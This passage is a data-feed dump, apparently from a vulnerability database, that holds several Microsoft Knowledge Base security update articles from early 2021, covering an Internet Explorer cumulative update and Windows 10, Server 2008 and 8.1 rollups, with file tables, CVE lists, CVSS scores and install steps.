13-Feb-2021| 12:28| 281,600 \nmsfeeds.dll| 9.0.8112.21532| 13-Feb-2021| 12:28| 729,088 \nmsfeeds.mof| Not versioned| 13-Feb-2021| 12:02| 1,518 \nmsfeedsbs.mof| Not versioned| 13-Feb-2021| 12:02| 1,574 \nmsfeedsbs.dll| 9.0.8112.21532| 13-Feb-2021| 12:28| 55,296 \nmsfeedssync.exe| 9.0.8112.21532| 13-Feb-2021| 12:28| 11,264 \nmshta.exe| 9.0.8112.21532| 13-Feb-2021| 12:27| 12,800 \nhtml.iec| 2019.0.0.21527| 13-Feb-2021| 12:37| 448,512 \nmshtmled.dll| 9.0.8112.21532| 13-Feb-2021| 12:28| 96,256 \nmshtml.dll| 9.0.8112.21532| 13-Feb-2021| 12:47| 18,810,880 \nmshtml.tlb| 9.0.8112.21532| 13-Feb-2021| 12:27| 2,382,848 \nielowutil.exe| 9.0.8112.21532| 13-Feb-2021| 12:28| 223,744 \nieproxy.dll| 9.0.8112.21532| 13-Feb-2021| 12:28| 550,912 \nIEShims.dll| 9.0.8112.21532| 13-Feb-2021| 12:28| 305,664 \nWindows Pop-up Blocked.wav| Not versioned| 27-Apr-2018| 10:11| 85,548 \nWindows Information Bar.wav| Not versioned| 27-Apr-2018| 10:11| 23,308 \nWindows Feed Discovered.wav| Not versioned| 27-Apr-2018| 10:11| 19,884 \nWindows Navigation Start.wav| Not versioned| 27-Apr-2018| 10:11| 11,340 \nieUnatt.exe| 9.0.8112.21532| 13-Feb-2021| 12:28| 173,568 \njsdbgui.dll| 9.0.8112.21532| 13-Feb-2021| 12:29| 499,712 \niertutil.dll| 9.0.8112.21532| 13-Feb-2021| 12:28| 2,163,200 \nsqmapi.dll| 6.0.6000.16386| 13-Feb-2021| 12:52| 176,048 \nVGX.dll| 9.0.8112.21532| 13-Feb-2021| 12:29| 997,376 \nurl.dll| 9.0.8112.21532| 13-Feb-2021| 12:28| 237,056 \nieframe.dll| 9.0.8112.21532| 13-Feb-2021| 12:33| 10,944,000 \nieui.dll| 9.0.8112.21532| 13-Feb-2021| 12:25| 248,320 \nieinstal.exe| 9.0.8112.21532| 13-Feb-2021| 12:28| 490,496 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:56| 393,813 \ninetres.admx| Not versioned| 27-Apr-2018| 10:14| 1,601,204 \njsdebuggeride.dll| 9.0.8112.21532| 13-Feb-2021| 12:28| 141,312 \njscript.dll| 5.8.7601.21527| 13-Feb-2021| 12:28| 818,176 \njscript9.dll| 9.0.8112.21532| 13-Feb-2021| 12:36| 2,358,784 \nvbscript.dll| 5.8.7601.21527| 13-Feb-2021| 12:28| 583,680 \niexplore.exe| 9.0.8112.21532| 13-Feb-2021| 11:48| 751,544 \nieUnatt.exe| 9.0.8112.21532| 13-Feb-2021| 11:36| 142,848 \nurlmon.dll| 9.0.8112.21532| 13-Feb-2021| 11:38| 1,141,248 \ninetcpl.cpl| 9.0.8112.21532| 13-Feb-2021| 11:36| 1,427,968 \nwininet.dll| 9.0.8112.21532| 13-Feb-2021| 11:37| 1,132,032 \njsproxy.dll| 9.0.8112.21532| 13-Feb-2021| 11:36| 75,776 \nWininetPlugin.dll| 1.0.0.1| 13-Feb-2021| 11:36| 66,048 \ntdc.ocx| 9.0.8112.21532| 13-Feb-2021| 11:35| 63,488 \niedvtool.dll| 9.0.8112.21532| 13-Feb-2021| 11:37| 678,912 \ndxtmsft.dll| 9.0.8112.21532| 13-Feb-2021| 11:36| 354,304 \ndxtrans.dll| 9.0.8112.21532| 13-Feb-2021| 11:35| 223,744 \nmsfeeds.dll| 9.0.8112.21532| 13-Feb-2021| 11:36| 607,744 \nmsfeeds.mof| Not versioned| 13-Feb-2021| 11:11| 1,518 \nmsfeedsbs.mof| Not versioned| 13-Feb-2021| 11:11| 1,574 \nmsfeedsbs.dll| 9.0.8112.21532| 13-Feb-2021| 11:35| 41,472 \nmsfeedssync.exe| 9.0.8112.21532| 13-Feb-2021| 11:35| 10,752 \nmshta.exe| 9.0.8112.21532| 13-Feb-2021| 11:35| 11,776 \nhtml.iec| 2019.0.0.21527| 13-Feb-2021| 11:40| 367,616 \nmshtmled.dll| 9.0.8112.21532| 13-Feb-2021| 11:35| 72,704 \nmshtml.dll| 9.0.8112.21532| 13-Feb-2021| 11:45| 12,844,544 \nmshtml.tlb| 9.0.8112.21532| 13-Feb-2021| 11:35| 2,382,848 \nielowutil.exe| 9.0.8112.21532| 13-Feb-2021| 11:36| 223,232 \nieproxy.dll| 9.0.8112.21532| 13-Feb-2021| 11:36| 195,072 \nIEShims.dll| 9.0.8112.21532| 13-Feb-2021| 11:36| 194,560 \nExtExport.exe| 9.0.8112.21532| 13-Feb-2021| 11:36| 22,528 \njsdbgui.dll| 9.0.8112.21532| 13-Feb-2021| 11:36| 388,096 \niertutil.dll| 9.0.8112.21532| 13-Feb-2021| 11:36| 1,808,384 \nsqmapi.dll| 6.0.6000.16386| 13-Feb-2021| 11:48| 142,776 \nVGX.dll| 9.0.8112.21532| 13-Feb-2021| 11:36| 769,024 \nurl.dll| 9.0.8112.21532| 13-Feb-2021| 11:36| 231,936 \nieframe.dll| 9.0.8112.21532| 13-Feb-2021| 11:39| 9,757,696 \nieui.dll| 9.0.8112.21532| 13-Feb-2021| 11:34| 176,640 \nieinstal.exe| 9.0.8112.21532| 13-Feb-2021| 11:36| 474,624 \njsdebuggeride.dll| 9.0.8112.21532| 13-Feb-2021| 11:36| 104,448 \njscript.dll| 5.8.7601.21527| 13-Feb-2021| 11:36| 723,456 \njscript9.dll| 9.0.8112.21532| 13-Feb-2021| 11:43| 1,819,648 \nvbscript.dll| 5.8.7601.21527| 13-Feb-2021| 11:36| 434,176 \n \n## Information about protection and security\n\n * Protect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151/windows-security-help>)\n * Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n\n## References\n\nLearn about the [terminology](<https://support.microsoft.com/help/824684>) that Microsoft uses to describe software updates.\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-09T08:00:00", "type": "mskb", "title": "KB5000800: Cumulative security update for Internet Explorer: March 9, 2021", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26411"], "modified": "2021-03-09T08:00:00", "id": "KB5000800", "href": "https://support.microsoft.com/en-us/help/5000800", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T14:07:17", "description": "None\n**NEW 3/9/21** \n**IMPORTANT **As part of the end of support for Adobe Flash, KB4577586 is now available as an optional update from Windows Update (WU) and Windows Server Update Services (WSUS). Installing KB4577586 will remove Adobe Flash Player permanently from your Windows device. Once installed, you cannot uninstall KB4577586. For more details about Microsoft\u2019s plans, see [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support>).\n\n**12/8/20** \nFor information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-10-update-servicing-cadence/ba-p/222376>). To view other notes and messages, see the Windows 10, version 1507 update history home page.\n\n## Highlights\n\n * Updates to improve security when using Microsoft Office products.\n * Updates security for the Windows user interface.\n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses an elevation of privilege security vulnerability documented in [CVE-2021-1640](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1640>) related to print jobs submitted to \u201cFILE:\u201d ports. After installing Windows updates from March 9, 2021 and later, print jobs that are in a pending state before restarting the print spooler service or restarting the OS will remain in an error state. Manually delete the affected print jobs and resubmit them to the print queue when the print spooler service is online.\n * Security updates to the Windows Shell, Windows User Account Control (UAC), Windows Fundamentals, Windows Core Networking, the Microsoft Graphics Component, Internet Explorer, Microsoft Edge Legacy, and Windows Media.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing updates released March 9, 2021 or March 15, 2021, you might get unexpected results when printing from some apps. Issues might include:\n\n * Elements of the document might print as solid black/color boxes or might be missing, including barcodes, QR codes, and graphics elements, such as logos.\n * Table lines might be missing. Other alignment or formatting issues might also be present.\n * Printing from some apps or to some printers might result in a blank page or label.\n| This issue is resolved in KB5001631. \n \n## How to get this update\n\n**Before installing this update**Microsoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.If you are using Windows Update, the latest SSU (KB5001079) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5000807>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 5000807](<https://download.microsoft.com/download/d/b/8/db8ecf43-5ffc-4a50-b422-6add89c7d6de/5000807.csv>). \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-09T08:00:00", "type": "mskb", "title": "March 9, 2021\u2014KB5000807 (OS Build 10240.18874)", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1640"], "modified": "2021-03-09T08:00:00", "id": "KB5000807", "href": "https://support.microsoft.com/en-us/help/5000807", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T14:06:16", "description": "None\n**NEW 8/5/21 \nEXPIRATION NOTICE****IMPORTANT **As of 8/5/2021, this KB is no longer available from Windows Update, the Microsoft Update Catalog, or other release channels. We recommend that you update your devices to the latest security quality update. \n\n**UPDATED 1/12/21 \nREMINDER **Adobe Flash Player went out of support on December 31, 2020. For more information, see [Adobe Flash end of support on December 31, 2020](<https://docs.microsoft.com/en-us/lifecycle/announcements/adobe-flash-end-of-support#:~:text=Adobe%20will%20end%20support%20of,site%2Dby%2Dsite%20basis.>). Flash content will be blocked from running in Flash Player beginning January 12, 2021. For more information, see [Adobe Flash Player EOL General Information Page](<https://www.adobe.com/products/flashplayer/end-of-life.html>).\n\n**11/19/20** \nFor information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-10-update-servicing-cadence/ba-p/222376>). To view other notes and messages, see the Windows 10, version 1607 update history home page.\n\n## Highlights\n\n * Updates to improve security when using Microsoft Office products.\n * Updates to improve security when using external devices, such as game controllers, printers, and web cameras.\n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Adds the ability to set a Group Policy to show only the domain and username when a user signs in.\n * Addresses an issue that delays authentication traffic because of Netlogon scalability issues.\n * Addresses an issue in which a principal in a trusted MIT realm fails to obtain a Kerberos service ticket from Active Directory domain controllers (DC). This occurs on devices that installed Windows Updates that contain CVE-2020-17049 protections and configured PerfromTicketSignature to 1 or higher. These updates were released between November 10, 2020 and December 8, 2020. Ticket acquisition also fails with the error, \u201cKRB_GENERIC_ERROR\u201d, if callers submit a PAC-less Ticket Granting Ticket (TGT) as an evidence ticket without providing the USER_NO_AUTH_DATA_REQUIRED flag.\n * Addresses a security bypass vulnerability that exists in the way the Printer Remote Procedure Call (RPC) binding handles authentication for the remote Winspool interface. For more information, see KB4599464.\n * Addresses a security vulnerability issue with HTTPS-based intranet servers. After installing this update, HTTPS-based intranet servers cannot, by default, use a user proxy to detect updates. Scans using these servers will fail if you have not configured a system proxy on the clients. If you must use a user proxy, you must configure the behavior using the policy \u201cAllow user proxy to be used as a fallback if detection using system proxy fails.\u201d To ensure the highest levels of security, also use Windows Server Update Services (WSUS) Transport Layer Security (TLS) certificate pinning on all devices. This change does not affect customers who are using HTTP WSUS servers. For more information, see [Changes to scans, improved security for Windows devices](<https://aka.ms/WSUS-scans-part2>).\n * Addresses an issue in the Remote Desktop Protocol (RDP) redirector (**rdpdr.sys**) that causes a stop error.\n * Security updates to the Windows App Platform and Frameworks, Microsoft Graphics Component, Windows Media, Windows Fundamentals, Windows Cryptography, Windows Virtualization, Windows Peripherals, and Windows Hybrid Storage Services.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing KB4467684, the cluster service may fail to start with the error \u201c2245 (NERR_PasswordTooShort)\u201d if the group policy \u201cMinimum Password Length\u201d is configured with greater than 14 characters.| This issue is resolved in KB4601318. \n \n## How to get this update\n\n**Before installing this update**Microsoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.If you are using Windows Update, the latest SSU (KB4576750) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB4598243>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 4598243](<https://download.microsoft.com/download/a/9/c/a9cc5807-bbe4-4aad-bb18-14455a62ae38/4598243.csv>).\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-12T08:00:00", "type": "mskb", "title": "January 12, 2021\u2014KB4598243 (OS Build 14393.4169) - EXPIRED", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17049", "CVE-2021-1655"], "modified": "2021-01-12T08:00:00", "id": "KB4598243", "href": "https://support.microsoft.com/en-us/help/4598243", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T14:06:26", "description": "None\n**IMPORTANT **Verify that you have installed the required updates listed in the **How to get this update** section _before_ installing this update. \n\nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows Server 2008 Service Pack 2 update history [home page](<https://support.microsoft.com/help/4343218>).\n\n## Improvements and fixes\n\nThis security update includes improvements and fixes that were a part of update [KB4592498](<https://support.microsoft.com/help/4592498>) (released December 8, 2020) and addresses the following issues:\n\n * Addresses a security bypass vulnerability that exists in the way the Printer Remote Procedure Call (RPC) binding handles authentication for the remote Winspool interface. For more information, see [KB4599464](<https://support.microsoft.com/help/4599464>).\n * Addresses a security vulnerability issue with HTTPS-based intranet servers. After you install this update, HTTPS-based intranet servers cannot leverage a user proxy to detect updates by default. Scans that use these servers will fail if the clients do not have a configured system proxy. \n \nIf you must leverage a user proxy, you must configure the behavior by using the Windows Update policy **Allow user proxy to be used as a fallback if detection using system proxy fails**. To make sure that the highest levels of security, additionally leverage Windows Server Update Services (WSUS) Transport Layer Security (TLS) certificate pinning on all devices. For more information, see [Changes to scans, improved security for Windows devices](<https://aka.ms/WSUS-scans-part2>). \n \n**Note** This change does not affect customers who use HTTP WSUS servers.\n * Addresses an issue in which a principal in a trusted Managed Identity for Application (MIT) realm does not obtain a Kerberos Service ticket from Active Directory domain controllers (DCs). This issue occurs after Windows Updates that contains [CVE-2020-17049](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-17049>) protections released between November 10 and December 8, 2020 are installed and **PerfromTicketSignature** is configured to **1** or higher. Ticket acquisition fails with KRB_GENERIC_ERROR if callers submit a PAC-less Ticket Granting Ticket (TGT) as an evidence ticket without providing the **USER_NO_AUTH_DATA_REQUIRED** flag.\n * Security updates to Windows App Platform and Frameworks, Windows Graphics, Windows Fundamentals, Windows Cryptography, Windows Virtualization, and Windows Hybrid Storage Services.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this update and restarting your device, you might receive the error, \u201cFailure to configure Windows updates. Reverting Changes. Do not turn off your computer\u201d, and the update might show as **Failed** in **Update History**.| This is expected in the following circumstances:\n\n * If you are installing this update on a device that is running an edition that is not supported for ESU. For a complete list of which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).\n * If you do not have an ESU MAK add-on key installed and activated.\nIf you have purchased an ESU key and have encountered this issue, please verify you have applied all prerequisites and that your key is activated. For information on activation, please see this [blog](<https://aka.ms/Windows7ESU>) post. For information on the prerequisites, see the \"How to get this update\" section of this article. \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## How to get this update\n\n**Before installing this update****IMPORTANT** Customers who have purchased the Extended Security Update (ESU) for on-premises versions of these operating systems must follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends on January 14, 2020.For more information about ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).**Prerequisite:**You must install the updates listed below and **_restart your device_** before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup and applying Microsoft security fixes.\n\n 1. The April 9, 2019 servicing stack update (SSU) ([KB4493730](<https://support.microsoft.com/help/4493730>)). To get the standalone package for this SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). This update is required to install updates that are only SHA-2 signed.\n 2. The latest SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) released October 8, 2019. If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. This update is required to install updates that are only SHA-2 signed. For more information on SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>).\n 3. The Extended Security Updates (ESU) Licensing Preparation Package ([KB4538484](<https://support.microsoft.com/help/4538484>)) or the Update for the Extended Security Updates (ESU) Licensing Preparation Package ([KB4575904](<https://support.microsoft.com/help/4575904>)). The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).\nAfter installing the items above, Microsoft strongly recommends that you install the _latest _SSU ([KB4580971](<https://support.microsoft.com/help/4580971>)). If you are using Windows Update, the latest SSU will be offered to you automatically if you are an ESU customer. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update if you are an ESU customer. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB4598288>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2008 Service Pack 2**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 4598288](<https://download.microsoft.com/download/9/8/0/980f60c3-10e1-40a3-baad-ae04e57bd3a2/4598288.csv>).\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-12T08:00:00", "type": "mskb", "title": "January 12, 2021\u2014KB4598288 (Monthly Rollup)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17049", "CVE-2021-1701"], "modified": "2021-01-12T08:00:00", "id": "KB4598288", "href": "https://support.microsoft.com/en-us/help/4598288", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T14:06:21", "description": "None\n**IMPORTANT **Adobe Flash Player went out of support on December 31, 2020. For more information, see [Adobe Flash end of support on December 31, 2020](<https://docs.microsoft.com/en-us/lifecycle/announcements/adobe-flash-end-of-support#:~:text=Adobe%20will%20end%20support%20of,site%2Dby%2Dsite%20basis.>). Flash content will be blocked from running in Flash Player beginning January 12, 2021. For more information, see [Adobe Flash Player EOL General Information Page](<https://www.adobe.com/products/flashplayer/end-of-life.html>).\n\n**IMPORTANT** Windows 8.1 and Windows Server 2012 R2 have reached the end of mainstream support and are now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release).\n\nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows 8.1 and Windows Server 2012 R2 update history [home page](<https://support.microsoft.com/help/4009470>).\n\n## Improvements and fixes\n\nThis security update includes improvements and fixes that were a part of update [KB4592484](<https://support.microsoft.com/help/4592484>) (released December 8, 2020) and addresses the following issues:\n\n * Addresses a security bypass vulnerability that exists in the way the Printer Remote Procedure Call (RPC) binding handles authentication for the remote Winspool interface. For more information, see [KB4599464](<https://support.microsoft.com/help/4599464>).\n * Addresses a security vulnerability issue with HTTPS-based intranet servers. After you install this update, HTTPS-based intranet servers cannot leverage a user proxy to detect updates by default. Scans that use these servers will fail if the clients do not have a configured system proxy. \n \nIf you must leverage a user proxy, you must configure the behavior by using the Windows Update policy **Allow user proxy to be used as a fallback if detection using system proxy fails**. To make sure that the highest levels of security, additionally leverage Windows Server Update Services (WSUS) Transport Layer Security (TLS) certificate pinning on all devices. For more information, see [Changes to scans, improved security for Windows devices](<https://aka.ms/WSUS-scans-part2>). \n \n**Note** This change does not affect customers who use HTTP WSUS servers.\n * Addresses an issue in which a principal in a trusted Managed Identity for Application (MIT) realm does not obtain a Kerberos Service ticket from Active Directory domain controllers (DCs). This issue occurs after Windows Updates that contains [CVE-2020-17049](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-17049>) protections released between November 10 and December 8, 2020 are installed and **PerfromTicketSignature** is configured to **1** or higher. Ticket acquisition fails with **KRB_GENERIC_ERROR** if callers submit a PAC-less Ticket Granting Ticket (TGT) as an evidence ticket without providing the **USER_NO_AUTH_DATA_REQUIRED** flag.\n * Security updates to Windows App Platform and Frameworks, Windows Graphics, Windows Media, Windows Fundamentals, Windows Cryptography, and Windows Virtualization.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## How to get this update\n\n**Before installing this update**We strongly recommend that you install the latest servicing stack update (SSU) for your operating system before you install the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).If you use Windows Update, the latest SSU ([KB4566425](<https://support.microsoft.com/help/4566425>)) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nMicrosoft Update Catalog| Yes| To 